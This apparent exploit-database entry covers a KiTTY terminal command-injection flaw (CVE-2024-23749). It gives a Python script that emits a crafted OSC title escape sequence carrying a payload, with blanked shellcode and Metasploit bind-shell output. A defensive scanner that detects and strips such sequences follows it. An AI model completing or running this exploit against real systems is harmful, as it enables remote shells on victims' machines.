KiTTY 0.76.1.13 - Command Injection

# Exploit Title: KiTTY 0.76.1.13 - Command Injection
# Exploit Author: DeFcesco (Austin A. Defrancesco)
# Vendor Homepage: https://github.com/cyd01/kitty/=
# Software Link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-23749
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# Blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler
# [*] Payload handler started as job 1
# msf6 payload(cmd/windows/powershell_bind_tcp) >
# [*] Started bind TCP handler against 192.168.100.28:444
# [*] Powershell session 1 opened (192.168.100.119:36969 -> 192.168.100.28:444)
#--------------------------------------------------------------------------------------------------------------------------------------------#
import os
import sys
#--------------------------------------------------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw
#--------------------------------------------------------------------------------------------------------#
# Raw payload bytes produced by the generate command above (an encoded
# PowerShell command line) go here.
shellcode = b''
# OSC 0 (set window title) sequence with the "__rv:" prefix, terminated by BEL.
escape_sequence = b'\033]0;__rv:'
# Bytes placed between the title prefix and the payload (not preserved on this page).
escape_sequence += b''
escape_sequence += shellcode
escape_sequence += b'#\007'
# Write the raw bytes to stdout so the terminal receives them unmodified.
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
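
A defensive counterpart to the script above, added here as an example and not part of the original exploit or of the KiTTY project: it scans untrusted bytes for OSC escape sequences (ESC ] ... BEL) like the one the script writes, flags those carrying the `__rv:` prefix, and strips them before the data reaches a terminal. The function names and the sample bytes are constructed for illustration.

```python
import re

# OSC = ESC ] <body>, terminated by BEL (0x07) or ST (ESC \).
OSC_RE = re.compile(rb'\x1b\](.*?)(?:\x07|\x1b\\)', re.DOTALL)
# Prefix used by the script on this page, after the "0;" title selector.
SUSPECT_PREFIX = b'__rv:'


def find_osc(data: bytes):
    """Return (offset, body, suspicious) for every complete OSC sequence."""
    hits = []
    for m in OSC_RE.finditer(data):
        body = m.group(1)
        # Body looks like b"0;<text>"; split off the numeric selector.
        _, _, text = body.partition(b';')
        hits.append((m.start(), body, text.startswith(SUSPECT_PREFIX)))
    return hits


def strip_osc(data: bytes) -> bytes:
    """Drop complete OSC sequences and any unterminated one at the end."""
    cleaned = OSC_RE.sub(b'', data)
    tail = cleaned.find(b'\x1b]')
    return cleaned if tail == -1 else cleaned[:tail]


# Constructed sample: an ordinary title change, one sequence with the
# page's prefix and a harmless placeholder body, and a truncated sequence.
SAMPLE = (b'login ok\n'
          b'\x1b]0;build server\x07'
          b'motd: \x1b]0;__rv:PLACEHOLDER\x07welcome\n'
          b'\x1b]2;unterminated')

if __name__ == '__main__':
    for offset, body, suspicious in find_osc(SAMPLE):
        print(offset, body, 'SUSPECT' if suspicious else 'ok')
    print(strip_osc(SAMPLE))
```

Run `strip_osc` on file contents, log lines or remote command output before displaying them in a terminal session, and alert on any `find_osc` hit marked suspicious.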